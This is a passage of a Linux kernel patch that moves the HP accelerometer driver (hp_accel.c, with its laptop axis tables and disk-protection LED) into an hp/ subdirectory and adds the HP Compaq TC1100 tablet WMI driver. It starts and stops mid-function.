++		return -EINVAL;
++	*ret = lret;
++	return 0;
++}
++
++/**
++ * lis3lv02d_acpi_write - ACPI ALWR method: write to a register
++ * @lis3: pointer to the device struct
++ * @reg:    the register to write to
++ * @val:    the value to write
++ *
++ * Returns 0 on success.
++ */
++static int lis3lv02d_acpi_write(struct lis3lv02d *lis3, int reg, u8 val)
++{
++	struct acpi_device *dev = lis3->bus_priv;
++	unsigned long long ret; /* Not used when writting */
++	union acpi_object in_obj[2];
++	struct acpi_object_list args = { 2, in_obj };
++
++	in_obj[0].type          = ACPI_TYPE_INTEGER;
++	in_obj[0].integer.value = reg;
++	in_obj[1].type          = ACPI_TYPE_INTEGER;
++	in_obj[1].integer.value = val;
++
++	if (acpi_evaluate_integer(dev->handle, "ALWR", &args, &ret) != AE_OK)
++		return -EINVAL;
++
++	return 0;
++}
++
++static int lis3lv02d_dmi_matched(const struct dmi_system_id *dmi)
++{
++	lis3_dev.ac = *((union axis_conversion *)dmi->driver_data);
++	pr_info("hardware type %s found\n", dmi->ident);
++
++	return 1;
++}
++
++/* Represents, for each axis seen by userspace, the corresponding hw axis (+1).
++ * If the value is negative, the opposite of the hw value is used. */
++#define DEFINE_CONV(name, x, y, z)			      \
++	static union axis_conversion lis3lv02d_axis_##name = \
++		{ .as_array = { x, y, z } }
++DEFINE_CONV(normal, 1, 2, 3);
++DEFINE_CONV(y_inverted, 1, -2, 3);
++DEFINE_CONV(x_inverted, -1, 2, 3);
++DEFINE_CONV(x_inverted_usd, -1, 2, -3);
++DEFINE_CONV(z_inverted, 1, 2, -3);
++DEFINE_CONV(xy_swap, 2, 1, 3);
++DEFINE_CONV(xy_rotated_left, -2, 1, 3);
++DEFINE_CONV(xy_rotated_left_usd, -2, 1, -3);
++DEFINE_CONV(xy_swap_inverted, -2, -1, 3);
++DEFINE_CONV(xy_rotated_right, 2, -1, 3);
++DEFINE_CONV(xy_swap_yz_inverted, 2, -1, -3);
++
++#define AXIS_DMI_MATCH(_ident, _name, _axis) {		\
++	.ident = _ident,				\
++	.callback = lis3lv02d_dmi_matched,		\
++	.matches = {					\
++		DMI_MATCH(DMI_PRODUCT_NAME, _name)	\
++	},						\
++	.driver_data = &lis3lv02d_axis_##_axis		\
++}
++
++#define AXIS_DMI_MATCH2(_ident, _class1, _name1,	\
++				_class2, _name2,	\
++				_axis) {		\
++	.ident = _ident,				\
++	.callback = lis3lv02d_dmi_matched,		\
++	.matches = {					\
++		DMI_MATCH(DMI_##_class1, _name1),	\
++		DMI_MATCH(DMI_##_class2, _name2),	\
++	},						\
++	.driver_data = &lis3lv02d_axis_##_axis		\
++}
++static const struct dmi_system_id lis3lv02d_dmi_ids[] = {
++	/* product names are truncated to match all kinds of a same model */
++	AXIS_DMI_MATCH("NC64x0", "HP Compaq nc64", x_inverted),
++	AXIS_DMI_MATCH("NC84x0", "HP Compaq nc84", z_inverted),
++	AXIS_DMI_MATCH("NX9420", "HP Compaq nx9420", x_inverted),
++	AXIS_DMI_MATCH("NW9440", "HP Compaq nw9440", x_inverted),
++	AXIS_DMI_MATCH("NC2510", "HP Compaq 2510", y_inverted),
++	AXIS_DMI_MATCH("NC2710", "HP Compaq 2710", xy_swap),
++	AXIS_DMI_MATCH("NC8510", "HP Compaq 8510", xy_swap_inverted),
++	AXIS_DMI_MATCH("HP2133", "HP 2133", xy_rotated_left),
++	AXIS_DMI_MATCH("HP2140", "HP 2140", xy_swap_inverted),
++	AXIS_DMI_MATCH("NC653x", "HP Compaq 653", xy_rotated_left_usd),
++	AXIS_DMI_MATCH("NC6730b", "HP Compaq 6730b", xy_rotated_left_usd),
++	AXIS_DMI_MATCH("NC6730s", "HP Compaq 6730s", xy_swap),
++	AXIS_DMI_MATCH("NC651xx", "HP Compaq 651", xy_rotated_right),
++	AXIS_DMI_MATCH("NC6710x", "HP Compaq 6710", xy_swap_yz_inverted),
++	AXIS_DMI_MATCH("NC6715x", "HP Compaq 6715", y_inverted),
++	AXIS_DMI_MATCH("NC693xx", "HP EliteBook 693", xy_rotated_right),
++	AXIS_DMI_MATCH("NC693xx", "HP EliteBook 853", xy_swap),
++	AXIS_DMI_MATCH("NC854xx", "HP EliteBook 854", y_inverted),
++	AXIS_DMI_MATCH("NC273xx", "HP EliteBook 273", y_inverted),
++	/* Intel-based HP Pavilion dv5 */
++	AXIS_DMI_MATCH2("HPDV5_I",
++			PRODUCT_NAME, "HP Pavilion dv5",
++			BOARD_NAME, "3603",
++			x_inverted),
++	/* AMD-based HP Pavilion dv5 */
++	AXIS_DMI_MATCH2("HPDV5_A",
++			PRODUCT_NAME, "HP Pavilion dv5",
++			BOARD_NAME, "3600",
++			y_inverted),
++	AXIS_DMI_MATCH("DV7", "HP Pavilion dv7", x_inverted),
++	AXIS_DMI_MATCH("HP8710", "HP Compaq 8710", y_inverted),
++	AXIS_DMI_MATCH("HDX18", "HP HDX 18", x_inverted),
++	AXIS_DMI_MATCH("HPB432x", "HP ProBook 432", xy_rotated_left),
++	AXIS_DMI_MATCH("HPB440G3", "HP ProBook 440 G3", x_inverted_usd),
++	AXIS_DMI_MATCH("HPB440G4", "HP ProBook 440 G4", x_inverted),
++	AXIS_DMI_MATCH("HPB442x", "HP ProBook 442", xy_rotated_left),
++	AXIS_DMI_MATCH("HPB450G0", "HP ProBook 450 G0", x_inverted),
++	AXIS_DMI_MATCH("HPB452x", "HP ProBook 452", y_inverted),
++	AXIS_DMI_MATCH("HPB522x", "HP ProBook 522", xy_swap),
++	AXIS_DMI_MATCH("HPB532x", "HP ProBook 532", y_inverted),
++	AXIS_DMI_MATCH("HPB655x", "HP ProBook 655", xy_swap_inverted),
++	AXIS_DMI_MATCH("Mini510x", "HP Mini 510", xy_rotated_left_usd),
++	AXIS_DMI_MATCH("HPB63xx", "HP ProBook 63", xy_swap),
++	AXIS_DMI_MATCH("HPB64xx", "HP ProBook 64", xy_swap),
++	AXIS_DMI_MATCH("HPB64xx", "HP EliteBook 84", xy_swap),
++	AXIS_DMI_MATCH("HPB65xx", "HP ProBook 65", x_inverted),
++	AXIS_DMI_MATCH("HPZBook15", "HP ZBook 15", x_inverted),
++	AXIS_DMI_MATCH("HPZBook17G5", "HP ZBook 17 G5", x_inverted),
++	AXIS_DMI_MATCH("HPZBook17", "HP ZBook 17", xy_swap_yz_inverted),
++	{ NULL, }
++/* Laptop models without axis info (yet):
++ * "NC6910" "HP Compaq 6910"
++ * "NC2400" "HP Compaq nc2400"
++ * "NX74x0" "HP Compaq nx74"
++ * "NX6325" "HP Compaq nx6325"
++ * "NC4400" "HP Compaq nc4400"
++ */
++};
++
++static void hpled_set(struct delayed_led_classdev *led_cdev, enum led_brightness value)
++{
++	struct acpi_device *dev = lis3_dev.bus_priv;
++	unsigned long long ret; /* Not used when writing */
++	union acpi_object in_obj[1];
++	struct acpi_object_list args = { 1, in_obj };
++
++	in_obj[0].type          = ACPI_TYPE_INTEGER;
++	in_obj[0].integer.value = !!value;
++
++	acpi_evaluate_integer(dev->handle, "ALED", &args, &ret);
++}
++
++static struct delayed_led_classdev hpled_led = {
++	.led_classdev = {
++		.name			= "hp::hddprotect",
++		.default_trigger	= "none",
++		.brightness_set		= delayed_sysfs_set,
++		.flags                  = LED_CORE_SUSPENDRESUME,
++	},
++	.set_brightness = hpled_set,
++};
++
++static bool hp_accel_i8042_filter(unsigned char data, unsigned char str,
++				  struct serio *port)
++{
++	static bool extended;
++
++	if (str & I8042_STR_AUXDATA)
++		return false;
++
++	if (data == 0xe0) {
++		extended = true;
++		return true;
++	} else if (unlikely(extended)) {
++		extended = false;
++
++		switch (data) {
++		case ACCEL_1:
++		case ACCEL_2:
++		case ACCEL_3:
++		case ACCEL_4:
++			return true;
++		default:
++			serio_interrupt(port, 0xe0, 0);
++			return false;
++		}
++	}
++
++	return false;
++}
++
++static int lis3lv02d_probe(struct platform_device *device)
++{
++	int ret;
++
++	lis3_dev.bus_priv = ACPI_COMPANION(&device->dev);
++	lis3_dev.init = lis3lv02d_acpi_init;
++	lis3_dev.read = lis3lv02d_acpi_read;
++	lis3_dev.write = lis3lv02d_acpi_write;
++
++	/* obtain IRQ number of our device from ACPI */
++	ret = platform_get_irq_optional(device, 0);
++	if (ret > 0)
++		lis3_dev.irq = ret;
++
++	/* If possible use a "standard" axes order */
++	if (lis3_dev.ac.x && lis3_dev.ac.y && lis3_dev.ac.z) {
++		pr_info("Using custom axes %d,%d,%d\n",
++			lis3_dev.ac.x, lis3_dev.ac.y, lis3_dev.ac.z);
++	} else if (dmi_check_system(lis3lv02d_dmi_ids) == 0) {
++		pr_info("laptop model unknown, using default axes configuration\n");
++		lis3_dev.ac = lis3lv02d_axis_normal;
++	}
++
++	/* call the core layer do its init */
++	ret = lis3lv02d_init_device(&lis3_dev);
++	if (ret)
++		return ret;
++
++	/* filter to remove HPQ6000 accelerometer data
++	 * from keyboard bus stream */
++	if (strstr(dev_name(&device->dev), "HPQ6000"))
++		i8042_install_filter(hp_accel_i8042_filter);
++
++	INIT_WORK(&hpled_led.work, delayed_set_status_worker);
++	ret = led_classdev_register(NULL, &hpled_led.led_classdev);
++	if (ret) {
++		i8042_remove_filter(hp_accel_i8042_filter);
++		lis3lv02d_joystick_disable(&lis3_dev);
++		lis3lv02d_poweroff(&lis3_dev);
++		flush_work(&hpled_led.work);
++		lis3lv02d_remove_fs(&lis3_dev);
++		return ret;
++	}
++
++	return ret;
++}
++
++static int lis3lv02d_remove(struct platform_device *device)
++{
++	i8042_remove_filter(hp_accel_i8042_filter);
++	lis3lv02d_joystick_disable(&lis3_dev);
++	lis3lv02d_poweroff(&lis3_dev);
++
++	led_classdev_unregister(&hpled_led.led_classdev);
++	flush_work(&hpled_led.work);
++
++	lis3lv02d_remove_fs(&lis3_dev);
++	return 0;
++}
++
++static int __maybe_unused lis3lv02d_suspend(struct device *dev)
++{
++	/* make sure the device is off when we suspend */
++	lis3lv02d_poweroff(&lis3_dev);
++	return 0;
++}
++
++static int __maybe_unused lis3lv02d_resume(struct device *dev)
++{
++	lis3lv02d_poweron(&lis3_dev);
++	return 0;
++}
++
++static SIMPLE_DEV_PM_OPS(hp_accel_pm, lis3lv02d_suspend, lis3lv02d_resume);
++
++/* For the HP MDPS aka 3D Driveguard */
++static struct platform_driver lis3lv02d_driver = {
++	.probe	= lis3lv02d_probe,
++	.remove	= lis3lv02d_remove,
++	.driver	= {
++		.name	= "hp_accel",
++		.pm	= &hp_accel_pm,
++		.acpi_match_table = lis3lv02d_device_ids,
++	},
++};
++module_platform_driver(lis3lv02d_driver);
++
++MODULE_DESCRIPTION("Glue between LIS3LV02Dx and HP ACPI BIOS and support for disk protection LED.");
++MODULE_AUTHOR("Yan Burman, Eric Piel, Pavel Machek");
++MODULE_LICENSE("GPL");
+diff --git a/drivers/platform/x86/hp/tc1100-wmi.c b/drivers/platform/x86/hp/tc1100-wmi.c
+new file mode 100644
+index 0000000000000..ded26213c4202
+--- /dev/null
++++ b/drivers/platform/x86/hp/tc1100-wmi.c
+@@ -0,0 +1,265 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *  HP Compaq TC1100 Tablet WMI Extras Driver
++ *
++ *  Copyright (C) 2007 Carlos Corbacho <carlos@strangeworlds.co.uk>
++ *  Copyright (C) 2004 Jamey Hicks <jamey.hicks@hp.com>
++ *  Copyright (C) 2001, 2002 Andy Grover <andrew.grover@intel.com>
++ *  Copyright (C) 2001, 2002 Paul Diefenbaugh <paul.s.diefenbaugh@intel.com>
++ */
++
++#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
++
++#include <linux/kernel.h>
++#include <linux/module.h>
++#include <linux/slab.h>
++#include <linux/init.h>
++#include <linux/types.h>
++#include <linux/acpi.h>
++#include <linux/platform_device.h>
++
++#define GUID "C364AC71-36DB-495A-8494-B439D472A505"
++
++#define TC1100_INSTANCE_WIRELESS		1
++#define TC1100_INSTANCE_JOGDIAL		2
++
++MODULE_AUTHOR("Jamey Hicks, Carlos Corbacho");
++MODULE_DESCRIPTION("HP Compaq TC1100 Tablet WMI Extras");
++MODULE_LICENSE("GPL");
++MODULE_ALIAS("wmi:C364AC71-36DB-495A-8494-B439D472A505");
++
++static struct platform_device *tc1100_device;
++
++struct tc1100_data {
++	u32 wireless;
++	u32 jogdial;
++};
++
++#ifdef CONFIG_PM
++static struct tc1100_data suspend_data;
++#endif
++
++/* --------------------------------------------------------------------------
++				Device Management
++   -------------------------------------------------------------------------- */
++
++static int get_state(u32 *out, u8 instance)
++{
++	u32 tmp;
++	acpi_status status;
++	struct acpi_buffer result = { ACPI_ALLOCATE_BUFFER, NULL };
++	union acpi_object *obj;
++
++	if (!out)
++		return -EINVAL;
++
++	if (instance > 2)
++		return -ENODEV;
++
++	status = wmi_query_block(GUID, instance, &result);
++	if (ACPI_FAILURE(status))
++		return -ENODEV;
++
++	obj = (union acpi_object *) result.pointer;
++	if (obj && obj->type == ACPI_TYPE_INTEGER) {
++		tmp = obj->integer.value;
++	} else {
++		tmp = 0;
++	}
++
++	if (result.length > 0)
++		kfree(result.pointer);
++
++	switch (instance) {
++	case TC1100_INSTANCE_WIRELESS:
++		*out = (tmp == 3) ? 1 : 0;
++		return 0;
++	case TC1100_INSTANCE_JOGDIAL:
++		*out = (tmp == 1) ? 0 : 1;
++		return 0;
++	default:
++		return -ENODEV;
++	}
++}
++
++static int set_state(u32 *in, u8 instance)
++{
++	u32 value;
++	acpi_status status;
++	struct acpi_buffer input;
++
++	if (!in)
++		return -EINVAL;
++
++	if (instance > 2)
++		return -ENODEV;
++
++	switch (instance) {
++	case TC1100_INSTANCE_WIRELESS:
++		value = (*in) ? 1 : 2;
++		break;
++	case TC1100_INSTANCE_JOGDIAL:
++		value = (*in) ? 0 : 1;
++		break;
++	default:
++		return -ENODEV;
++	}
++
++	input.length = sizeof(u32);
++	input.pointer = &value;
++
++	status = wmi_set_block(GUID, instance, &input);
++	if (ACPI_FAILURE(status))
++		return -ENODEV;
++
++	return 0;
++}
++
++/* --------------------------------------------------------------------------
++				FS Interface (/sys)
++   -------------------------------------------------------------------------- */
++
++/*
++ * Read/ write bool sysfs macro
++ */
++#define show_set_bool(value, instance) \
++static ssize_t \
++show_bool_##value(struct device *dev, struct device_attribute *attr, \
++	char *buf) \
++{ \
++	u32 result; \
++	acpi_status status = get_state(&result, instance); \
++	if (ACPI_SUCCESS(status)) \
++		return sprintf(buf, "%d\n", result); \
++	return sprintf(buf, "Read error\n"); \
++} \
++\
++static ssize_t \
++set_bool_##value(struct device *dev, struct device_attribute *attr, \
++	const char *buf, size_t count) \
++{ \
++	u32 tmp = simple_strtoul(buf, NULL, 10); \
++	acpi_status status = set_state(&tmp, instance); \
++		if (ACPI_FAILURE(status)) \
++			return -EINVAL; \
++	return count; \
++} \
++static DEVICE_ATTR(value, S_IRUGO | S_IWUSR, \
++	show_bool_##value, set_bool_##value);
++
++show_set_bool(wireless, TC1100_INSTANCE_WIRELESS);
++show_set_bool(jogdial, TC1100_INSTANCE_JOGDIAL);
++
++static struct attribute *tc1100_attributes[] = {
++	&dev_attr_wireless.attr,
++	&dev_attr_jogdial.attr,
++	NULL
++};
++
++static const struct attribute_group tc1100_attribute_group = {
++	.attrs	= tc1100_attributes,
++};
++
++/* --------------------------------------------------------------------------
++				Driver Model
++   -------------------------------------------------------------------------- */
++
++static int __init tc1100_probe(struct platform_device *device)
++{
++	return sysfs_create_group(&device->dev.kobj, &tc1100_attribute_group);
++}
++
++
++static int tc1100_remove(struct platform_device *device)
++{
++	sysfs_remove_group(&device->dev.kobj, &tc1100_attribute_group);
++
++	return 0;
++}
++
++#ifdef CONFIG_PM
++static int tc1100_suspend(struct device *dev)
++{
++	int ret;
++
++	ret = get_state(&suspend_data.wireless, TC1100_INSTANCE_WIRELESS);
++	if (ret)
++		return ret;
++
++	ret = get_state(&suspend_data.jogdial, TC1100_INSTANCE_JOGDIAL);
++	if (ret)
++		return ret;
++
++	return 0;
++}
++
++static int tc1100_resume(struct device *dev)
++{
++	int ret;
++
++	ret = set_state(&suspend_data.wireless, TC1100_INSTANCE_WIRELESS);
++	if (ret)
++		return ret;
++
++	ret = set_state(&suspend_data.jogdial, TC1100_INSTANCE_JOGDIAL);
++	if (ret)
++		return ret;
++
++	return 0;
++}
++
++static const struct dev_pm_ops tc1100_pm_ops = {
++	.suspend	= tc1100_suspend,
++	.resume		= tc1100_resume,
++	.freeze		= tc1100_suspend,
++	.restore	= tc1100_resume,
++};
++#endif
++
++static struct platform_driver tc1100_driver = {
++	.driver = {
++		.name = "tc1100-wmi",
++#ifdef CONFIG_PM
++		.pm = &tc1100_pm_ops,
++#endif
++	},
++	.remove = tc1100_remove,
++};
++
++static int __init tc1100_init(void)
++{
++	int error;
++
++	if (!wmi_has_guid(GUID))
++		return -ENODEV;
++
++	tc1100_device = platform_device_alloc("tc1100-wmi", PLATFORM_DEVID_NONE);
++	if (!tc1100_device)
++		return -ENOMEM;
++
++	error = platform_device_add(tc1100_device);
++	if (error)
++		goto err_device_put;
++
++	error = platform_driver_probe(&tc1100_driver, tc1100_probe);
++	if (error)
++		goto err_device_del;
++
++	pr_info("HP Compaq TC1100 Tablet WMI Extras loaded\n");
++	return 0;
++
++ err_device_del:
++	platform_device_del(tc1100_device);
++ err_device_put:
++	platform_device_put(tc1100_device);
++	return error;
++}
++
++static void __exit tc1100_exit(void)
++{
++	platform_device_unregister(tc1100_device);
++	platform_driver_unregister(&tc1100_driver);
++}
++
++module_init(tc1100_init);
++module_exit(tc1100_exit);
+diff --git a/drivers/platform/x86/hp_accel.c b/drivers/platform/x86/hp_accel.c
+deleted file mode 100644
+index e9f852f7c27ff..0000000000000
+--- a/drivers/platform/x86/hp_accel.c
++++ /dev/null
+@@ -1,387 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *  hp_accel.c - Interface between LIS3LV02DL driver and HP ACPI BIOS
+- *
+- *  Copyright (C) 2007-2008 Yan Burman
+- *  Copyright (C) 2008 Eric Piel
+- *  Copyright (C) 2008-2009 Pavel Machek
+- */
+-
+-#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+-
+-#include <linux/kernel.h>
+-#include <linux/init.h>
+-#include <linux/dmi.h>
+-#include <linux/module.h>
+-#include <linux/types.h>
+-#include <linux/platform_device.h>
+-#include <linux/interrupt.h>
+-#include <linux/delay.h>
+-#include <linux/wait.h>
+-#include <linux/poll.h>
+-#include <linux/freezer.h>
+-#include <linux/uaccess.h>
+-#include <linux/leds.h>
+-#include <linux/atomic.h>
+-#include <linux/acpi.h>
+-#include <linux/i8042.h>
+-#include <linux/serio.h>
+-#include "../../misc/lis3lv02d/lis3lv02d.h"
+-
+-/* Delayed LEDs infrastructure ------------------------------------ */
+-
+-/* Special LED class that can defer work */
+-struct delayed_led_classdev {
+-	struct led_classdev led_classdev;
+-	struct work_struct work;
+-	enum led_brightness new_brightness;
+-
+-	unsigned int led;		/* For driver */
+-	void (*set_brightness)(struct delayed_led_classdev *data, enum led_brightness value);
+-};
+-
+-static inline void delayed_set_status_worker(struct work_struct *work)
+-{
+-	struct delayed_led_classdev *data =
+-			container_of(work, struct delayed_led_classdev, work);
+-
+-	data->set_brightness(data, data->new_brightness);
+-}
+-
+-static inline void delayed_sysfs_set(struct led_classdev *led_cdev,
+-			      enum led_brightness brightness)
+-{
+-	struct delayed_led_classdev *data = container_of(led_cdev,
+-			     struct delayed_led_classdev, led_classdev);
+-	data->new_brightness = brightness;
+-	schedule_work(&data->work);
+-}
+-
+-/* HP-specific accelerometer driver ------------------------------------ */
+-
+-/* e0 25, e0 26, e0 27, e0 28 are scan codes that the accelerometer with acpi id
+- * HPQ6000 sends through the keyboard bus */
+-#define ACCEL_1 0x25
+-#define ACCEL_2 0x26
+-#define ACCEL_3 0x27
+-#define ACCEL_4 0x28
+-
+-/* For automatic insertion of the module */
+-static const struct acpi_device_id lis3lv02d_device_ids[] = {
+-	{"HPQ0004", 0}, /* HP Mobile Data Protection System PNP */
+-	{"HPQ6000", 0}, /* HP Mobile Data Protection System PNP */
+-	{"HPQ6007", 0}, /* HP Mobile Data Protection System PNP */
+-	{"", 0},
+-};
+-MODULE_DEVICE_TABLE(acpi, lis3lv02d_device_ids);
+-
+-/**
+- * lis3lv02d_acpi_init - initialize the device for ACPI
+- * @lis3: pointer to the device struct
+- *
+- * Returns 0 on success.
+- */
+-static int lis3lv02d_acpi_init(struct lis3lv02d *lis3)
+-{
+-	return 0;
+-}
+-
+-/**
+- * lis3lv02d_acpi_read - ACPI ALRD method: read a register
+- * @lis3: pointer to the device struct
+- * @reg:    the register to read
+- * @ret:    result of the operation
+- *
+- * Returns 0 on success.
+- */
+-static int lis3lv02d_acpi_read(struct lis3lv02d *lis3, int reg, u8 *ret)
+-{
+-	struct acpi_device *dev = lis3->bus_priv;
+-	union acpi_object arg0 = { ACPI_TYPE_INTEGER };
+-	struct acpi_object_list args = { 1, &arg0 };
+-	unsigned long long lret;
+-	acpi_status status;
+-
+-	arg0.integer.value = reg;
+-
+-	status = acpi_evaluate_integer(dev->handle, "ALRD", &args, &lret);
+-	if (ACPI_FAILURE(status))
+-		return -EINVAL;
+-	*ret = lret;
+-	return 0;
+-}
+-
+-/**
+- * lis3lv02d_acpi_write - ACPI ALWR method: write to a register
+- * @lis3: pointer to the device struct
+- * @reg:    the register to write to
+- * @val:    the value to write
+- *
+- * Returns 0 on success.
+- */
+-static int lis3lv02d_acpi_write(struct lis3lv02d *lis3, int reg, u8 val)
+-{
+-	struct acpi_device *dev = lis3->bus_priv;
+-	unsigned long long ret; /* Not used when writting */
+-	union acpi_object in_obj[2];
+-	struct acpi_object_list args = { 2, in_obj };
+-
+-	in_obj[0].type          = ACPI_TYPE_INTEGER;
+-	in_obj[0].integer.value = reg;
+-	in_obj[1].type          = ACPI_TYPE_INTEGER;
+-	in_obj[1].integer.value = val;
+-
+-	if (acpi_evaluate_integer(dev->handle, "ALWR", &args, &ret) != AE_OK)
+-		return -EINVAL;
+-
+-	return 0;
+-}
+-
+-static int lis3lv02d_dmi_matched(const struct dmi_system_id *dmi)
+-{
+-	lis3_dev.ac = *((union axis_conversion *)dmi->driver_data);
+-	pr_info("hardware type %s found\n", dmi->ident);
+-
+-	return 1;
+-}
+-
+-/* Represents, for each axis seen by userspace, the corresponding hw axis (+1).
+- * If the value is negative, the opposite of the hw value is used. */
+-#define DEFINE_CONV(name, x, y, z)			      \
+-	static union axis_conversion lis3lv02d_axis_##name = \
+-		{ .as_array = { x, y, z } }
+-DEFINE_CONV(normal, 1, 2, 3);
+-DEFINE_CONV(y_inverted, 1, -2, 3);
+-DEFINE_CONV(x_inverted, -1, 2, 3);
+-DEFINE_CONV(x_inverted_usd, -1, 2, -3);
+-DEFINE_CONV(z_inverted, 1, 2, -3);
+-DEFINE_CONV(xy_swap, 2, 1, 3);
+-DEFINE_CONV(xy_rotated_left, -2, 1, 3);
+-DEFINE_CONV(xy_rotated_left_usd, -2, 1, -3);
+-DEFINE_CONV(xy_swap_inverted, -2, -1, 3);
+-DEFINE_CONV(xy_rotated_right, 2, -1, 3);
+-DEFINE_CONV(xy_swap_yz_inverted, 2, -1, -3);
+-
+-#define AXIS_DMI_MATCH(_ident, _name, _axis) {		\
+-	.ident = _ident,				\
+-	.callback = lis3lv02d_dmi_matched,		\
+-	.matches = {					\
+-		DMI_MATCH(DMI_PRODUCT_NAME, _name)	\
+-	},						\
+-	.driver_data = &lis3lv02d_axis_##_axis		\
+-}
+-
+-#define AXIS_DMI_MATCH2(_ident, _class1, _name1,	\
+-				_class2, _name2,	\
+-				_axis) {		\
+-	.ident = _ident,				\
+-	.callback = lis3lv02d_dmi_matched,		\
+-	.matches = {					\
+-		DMI_MATCH(DMI_##_class1, _name1),	\
+-		DMI_MATCH(DMI_##_class2, _name2),	\
+-	},						\
+-	.driver_data = &lis3lv02d_axis_##_axis		\
+-}
+-static const struct dmi_system_id lis3lv02d_dmi_ids[] = {
+-	/* product names are truncated to match all kinds of a same model */
+-	AXIS_DMI_MATCH("NC64x0", "HP Compaq nc64", x_inverted),
+-	AXIS_DMI_MATCH("NC84x0", "HP Compaq nc84", z_inverted),
+-	AXIS_DMI_MATCH("NX9420", "HP Compaq nx9420", x_inverted),
+-	AXIS_DMI_MATCH("NW9440", "HP Compaq nw9440", x_inverted),
+-	AXIS_DMI_MATCH("NC2510", "HP Compaq 2510", y_inverted),
+-	AXIS_DMI_MATCH("NC2710", "HP Compaq 2710", xy_swap),
+-	AXIS_DMI_MATCH("NC8510", "HP Compaq 8510", xy_swap_inverted),
+-	AXIS_DMI_MATCH("HP2133", "HP 2133", xy_rotated_left),
+-	AXIS_DMI_MATCH("HP2140", "HP 2140", xy_swap_inverted),
+-	AXIS_DMI_MATCH("NC653x", "HP Compaq 653", xy_rotated_left_usd),
+-	AXIS_DMI_MATCH("NC6730b", "HP Compaq 6730b", xy_rotated_left_usd),
+-	AXIS_DMI_MATCH("NC6730s", "HP Compaq 6730s", xy_swap),
+-	AXIS_DMI_MATCH("NC651xx", "HP Compaq 651", xy_rotated_right),
+-	AXIS_DMI_MATCH("NC6710x", "HP Compaq 6710", xy_swap_yz_inverted),
+-	AXIS_DMI_MATCH("NC6715x", "HP Compaq 6715", y_inverted),
+-	AXIS_DMI_MATCH("NC693xx", "HP EliteBook 693", xy_rotated_right),
+-	AXIS_DMI_MATCH("NC693xx", "HP EliteBook 853", xy_swap),
+-	AXIS_DMI_MATCH("NC854xx", "HP EliteBook 854", y_inverted),
+-	AXIS_DMI_MATCH("NC273xx", "HP EliteBook 273", y_inverted),
+-	/* Intel-based HP Pavilion dv5 */
+-	AXIS_DMI_MATCH2("HPDV5_I",
+-			PRODUCT_NAME, "HP Pavilion dv5",
+-			BOARD_NAME, "3603",
+-			x_inverted),
+-	/* AMD-based HP Pavilion dv5 */
+-	AXIS_DMI_MATCH2("HPDV5_A",
+-			PRODUCT_NAME, "HP Pavilion dv5",
+-			BOARD_NAME, "3600",
+-			y_inverted),
+-	AXIS_DMI_MATCH("DV7", "HP Pavilion dv7", x_inverted),
+-	AXIS_DMI_MATCH("HP8710", "HP Compaq 8710", y_inverted),
+-	AXIS_DMI_MATCH("HDX18", "HP HDX 18", x_inverted),
+-	AXIS_DMI_MATCH("HPB432x", "HP ProBook 432", xy_rotated_left),
+-	AXIS_DMI_MATCH("HPB440G3", "HP ProBook 440 G3", x_inverted_usd),
+-	AXIS_DMI_MATCH("HPB440G4", "HP ProBook 440 G4", x_inverted),
+-	AXIS_DMI_MATCH("HPB442x", "HP ProBook 442", xy_rotated_left),
+-	AXIS_DMI_MATCH("HPB450G0", "HP ProBook 450 G0", x_inverted),
+-	AXIS_DMI_MATCH("HPB452x", "HP ProBook 452", y_inverted),
+-	AXIS_DMI_MATCH("HPB522x", "HP ProBook 522", xy_swap),
+-	AXIS_DMI_MATCH("HPB532x", "HP ProBook 532", y_inverted),
+-	AXIS_DMI_MATCH("HPB655x", "HP ProBook 655", xy_swap_inverted),
+-	AXIS_DMI_MATCH("Mini510x", "HP Mini 510", xy_rotated_left_usd),
+-	AXIS_DMI_MATCH("HPB63xx", "HP ProBook 63", xy_swap),
+-	AXIS_DMI_MATCH("HPB64xx", "HP ProBook 64", xy_swap),
+-	AXIS_DMI_MATCH("HPB64xx", "HP EliteBook 84", xy_swap),
+-	AXIS_DMI_MATCH("HPB65xx", "HP ProBook 65", x_inverted),
+-	AXIS_DMI_MATCH("HPZBook15", "HP ZBook 15", x_inverted),
+-	AXIS_DMI_MATCH("HPZBook17G5", "HP ZBook 17 G5", x_inverted),
+-	AXIS_DMI_MATCH("HPZBook17", "HP ZBook 17", xy_swap_yz_inverted),
+-	{ NULL, }
+-/* Laptop models without axis info (yet):
+- * "NC6910" "HP Compaq 6910"
+- * "NC2400" "HP Compaq nc2400"
+- * "NX74x0" "HP Compaq nx74"
+- * "NX6325" "HP Compaq nx6325"
+- * "NC4400" "HP Compaq nc4400"
+- */
+-};
+-
+-static void hpled_set(struct delayed_led_classdev *led_cdev, enum led_brightness value)
+-{
+-	struct acpi_device *dev = lis3_dev.bus_priv;
+-	unsigned long long ret; /* Not used when writing */
+-	union acpi_object in_obj[1];
+-	struct acpi_object_list args = { 1, in_obj };
+-
+-	in_obj[0].type          = ACPI_TYPE_INTEGER;
+-	in_obj[0].integer.value = !!value;
+-
+-	acpi_evaluate_integer(dev->handle, "ALED", &args, &ret);
+-}
+-
+-static struct delayed_led_classdev hpled_led = {
+-	.led_classdev = {
+-		.name			= "hp::hddprotect",
+-		.default_trigger	= "none",
+-		.brightness_set		= delayed_sysfs_set,
+-		.flags                  = LED_CORE_SUSPENDRESUME,
+-	},
+-	.set_brightness = hpled_set,
+-};
+-
+-static bool hp_accel_i8042_filter(unsigned char data, unsigned char str,
+-				  struct serio *port)
+-{
+-	static bool extended;
+-
+-	if (str & I8042_STR_AUXDATA)
+-		return false;
+-
+-	if (data == 0xe0) {
+-		extended = true;
+-		return true;
+-	} else if (unlikely(extended)) {
+-		extended = false;
+-
+-		switch (data) {
+-		case ACCEL_1:
+-		case ACCEL_2:
+-		case ACCEL_3:
+-		case ACCEL_4:
+-			return true;
+-		default:
+-			serio_interrupt(port, 0xe0, 0);
+-			return false;
+-		}
+-	}
+-
+-	return false;
+-}
+-
+-static int lis3lv02d_probe(struct platform_device *device)
+-{
+-	int ret;
+-
+-	lis3_dev.bus_priv = ACPI_COMPANION(&device->dev);
+-	lis3_dev.init = lis3lv02d_acpi_init;
+-	lis3_dev.read = lis3lv02d_acpi_read;
+-	lis3_dev.write = lis3lv02d_acpi_write;
+-
+-	/* obtain IRQ number of our device from ACPI */
+-	ret = platform_get_irq_optional(device, 0);
